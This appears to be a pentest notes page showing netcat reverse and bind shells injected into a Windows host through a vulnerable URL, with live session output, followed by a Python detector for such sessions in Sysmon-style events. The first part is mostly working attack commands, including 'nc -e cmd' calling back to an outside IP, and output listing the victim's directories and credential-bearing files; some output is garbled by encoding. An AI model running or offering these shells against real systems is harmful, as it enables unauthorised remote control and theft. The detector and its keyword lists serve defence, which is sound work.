1. Reverse shells

Strict inbound, loose outbound (target can reach the internet)

If the target is a Windows host that happens to have an nc binary, and the application has a vulnerability that lets a reverse-shell command be injected, this approach fits when the target's outbound rules are not strict. If the target enforces strict outbound port filtering it is much less applicable; you can still try some commonly allowed ports, but the chosen port must not already be in use on the target itself, because if it is, the callback to your machine fails and you never reach the controlled host.

# Windows: the injected command, usually appended to the vulnerable URL as the reverse-shell payload
C:\Users\linux>nc -e cmd 193.112.95.180 8888

# yum install -y ncat
# attacker machine
root@VM-8-14-ubuntu:~# ncat -lvvp 8888
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::8888
Ncat: Listening on 0.0.0.0:8888
Ncat: Connection from 223.104.43.40.
Ncat: Connection from 223.104.43.40:21059.
Microsoft Windows [�汾 10.0.26100.4484]
(c) Microsoft Corporation����������Ȩ����

C:\Users\linux>whoami
whoami
desktop-can59fe\linux

C:\Users\linux>E:
E:

E:\>dir
dir
 ������ E �еľ��� ��̬����
 ��������� E46C-7798

 E:\ ��Ŀ¼

2025/06/28  22:37    <DIR>          .pnpm-store
2025/05/16  20:38    <DIR>          360Downloads
2025/10/23  23:54    <DIR>          BaiduNetdiskDownload
2025/09/08  00:14    <DIR>          code
2025/09/22  20:29            12,288 DumpStack.log
2025/10/26  21:41    <DIR>          game
2025/07/27  01:38               159 kingdom-come-deliverance-ii-trainer
2023/12/15  10:23    <DIR>          Program Files
2025/06/28  19:40    <DIR>          Program Files (x86)
2025/10/27  23:34    <DIR>          software
2025/10/19  23:17    <DIR>          SteamLibrary
2025/06/01  03:28    <DIR>          temp
2025/05/13  21:23    <DIR>          vivo�ֻ�����
2024/09/28  21:22    <DIR>          vm
2025/10/25  00:20    <DIR>          vm2
2025/09/27  22:29    <DIR>          WeGameApps
2025/07/19  18:45    <DIR>          ZtsmEntDownload
2025/10/27  23:34    <DIR>          ����
2025/08/20  00:40    <DIR>          С��Ӱ
2025/09/01  00:02    <DIR>          Ѹ������
2025/09/01  06:12    <DIR>          Ѹ������
               2 ���ļ�         12,447 �ֽ�
              19 ��Ŀ¼ 765,285,363,712 �����ֽ�

Loose inbound, strict outbound (target cannot reach the internet)

# On the target, inject via the vulnerable entry point and wait for the port to be connected to
C:\Users\linux>nc -e cmd -lvp 8888
listening on [any] 8888 ...

# The attacker just connects to the target's port
[root@localhost ~]# nc 172.31.0.1 8888
Microsoft Windows [°汾 10.0.26100.4484]
(c) Microsoft Corporation¡£±£´̹ԐȨ{¡£

C:\Users\linux>whoami
whoami
desktop-can59fe\linux

C:\Users\linux>dir
dir
 Ƚ¶¯Ƿ C אµľ ϵͳ
 ¾�ѲºƊŠA4E6-9D22

 C:\Users\linux µń¿¼

2025/10/24  01:17    <DIR>          .
2025/04/20  04:03    <DIR>          ..
2025/09/25  00:20    <DIR>          .android
2025/07/20  04:23               292 .bash_history
2025/05/26  21:35    <DIR>          .cache
2025/06/02  23:19    <DIR>          .codingCopilot
2024/01/16  22:30    <DIR>          .config
2025/09/07  06:03    <DIR>          .cursor
2025/10/09  02:22               413 .cursor_info
2025/04/20  02:38                16 .emulator_console_auth_token
2025/06/05  08:34               142 .gitconfig
2025/08/24  01:43    <DIR>          .gongfeng_copilot
2025/09/24  22:17    <DIR>          .gradle
2025/05/11  23:32    <DIR>          .jdks
2025/08/16  16:21    <DIR>          .leigod
2025/05/26  04:01                20 .lesshst
2025/05/24  20:59    <DIR>          .m2
2025/06/02  05:26               152 .npmrc
2025/06/28  22:34    <DIR>          .pnpm
2025/06/28  22:34    <DIR>          .pnpm-cache
2025/06/28  22:34    <DIR>          .pnpm-state
2025/09/07  07:39    <DIR>          .qoder
2025/06/28  21:49    <DIR>          .redhat
2025/08/09  22:51    <DIR>          .vscode
2025/03/16  13:09             3,465 AMDRM_Install.log
2025/03/16  13:10         3,721,722 AMD_RyzenMaster.log
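Seen from the defender's side, the two sessions above leave a very distinctive pattern in endpoint telemetry: nc/ncat spawning cmd (the -e argument) and then either initiating an outbound connection (reverse shell) or accepting an inbound one on a listening port (bind shell). The following Python detector is an added example, not part of the original notes; the event records are constructed to mimic Sysmon Event ID 1 (ProcessCreate) and Event ID 3 (NetworkConnect) and reuse the page's addresses, and the flattened field names (pid, cmdline, initiated, dst, src, dport) are an assumption.

```python
import re

NETCAT = {"nc", "nc.exe", "ncat", "ncat.exe", "netcat", "netcat.exe"}
SHELLS = {"cmd", "cmd.exe", "powershell", "powershell.exe", "sh", "bash", "/bin/sh", "/bin/bash"}
EXEC_FLAGS = {"-e", "-c", "--exec", "--sh-exec"}

# Constructed sample records (not real telemetry), shaped like Sysmon
# Event ID 1 (ProcessCreate) and Event ID 3 (NetworkConnect), flattened to dicts.
SAMPLE_EVENTS = [
    {"id": 1, "pid": 4120, "cmdline": "nc -e cmd 193.112.95.180 8888"},      # reverse shell
    {"id": 3, "pid": 4120, "initiated": True, "dst": "193.112.95.180", "dport": 8888},
    {"id": 1, "pid": 5208, "cmdline": "nc -e cmd -lvp 8888"},                # bind shell
    {"id": 3, "pid": 5208, "initiated": False, "src": "172.31.0.1", "dport": 8888},
    {"id": 1, "pid": 6001, "cmdline": "curl https://example.invalid/"},      # benign tool
    {"id": 3, "pid": 6001, "initiated": True, "dst": "203.0.113.5", "dport": 443},
]


def classify_cmdline(cmdline):
    """Return 'bind', 'reverse' or None for a netcat command line that spawns a shell."""
    argv = cmdline.split()
    if not argv or re.split(r"[\\/]", argv[0])[-1].lower() not in NETCAT:
        return None
    spawns_shell = listens = False
    for i, tok in enumerate(argv[1:], start=1):
        if tok in EXEC_FLAGS and i + 1 < len(argv):
            spawns_shell |= argv[i + 1].lower() in SHELLS   # -e cmd, --exec cmd.exe, ...
        elif tok.startswith("-") and not tok.startswith("--"):
            listens |= "l" in tok[1:]                       # combined short flags like -lvp
    if not spawns_shell:
        return None                                         # plain listener/client: not a shell
    return "bind" if listens else "reverse"


def detect(events):
    """Correlate ProcessCreate and NetworkConnect events by pid into a list of alerts."""
    procs = {}
    for ev in events:
        if ev["id"] == 1 and (kind := classify_cmdline(ev["cmdline"])):
            procs[ev["pid"]] = {"pid": ev["pid"], "kind": kind, "confirmed": False, "peer": None}
    for ev in events:
        p = procs.get(ev["pid"]) if ev["id"] == 3 else None
        if p is None:
            continue
        # Only the direction that matches the command line confirms the alert: a reverse
        # shell initiates an outbound connection, a bind shell accepts an inbound one.
        if p["kind"] == "reverse" and ev["initiated"]:
            p["confirmed"], p["peer"] = True, f'{ev["dst"]}:{ev["dport"]}'
        elif p["kind"] == "bind" and not ev["initiated"]:
            p["confirmed"], p["peer"] = True, f'{ev["src"]}:{ev["dport"]}'
    return sorted(procs.values(), key=lambda a: a["pid"])


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

The command-line rule alone catches the listener before anyone connects, which matters for the bind-shell case where no outbound traffic ever appears.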